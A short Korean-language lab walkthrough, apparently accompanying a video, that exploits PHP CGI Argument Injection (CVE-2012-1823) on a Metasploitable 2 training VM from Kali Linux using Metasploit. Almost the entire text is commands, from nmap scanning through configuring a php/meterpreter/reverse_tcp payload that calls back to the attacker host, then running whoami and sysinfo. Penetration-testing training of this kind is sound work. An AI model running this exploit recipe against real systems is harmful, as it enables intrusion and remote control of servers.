
이 비디오에서는 Kali Linux를 통해 Metasploitable 2 서버에 대한 PHP CGI Argument Injection(CVE-2012-1823) 익스플로잇이 Metasploit을 사용하여 수행됩니다.
Kali에서 Metasploitable IP를 확인하세요:
ip a
예를 들어:
Kali: 192.168.56.101
Metasploitable2: 192.168.56.102
포트와 서비스를 확인합니다:
nmap -p 80 192.168.56.102
브라우저에서도 확인할 수 있습니다:
msfconsole
search php cgi
올바른 모듈:
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS 192.168.56.102
set RPORT 80
set TARGETURI /
페이로드를 선택합니다:
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444
확인해 보겠습니다:
show options
run
또는
exploit
성공하면:
Meterpreter session 1 opened
sysinfo
whoami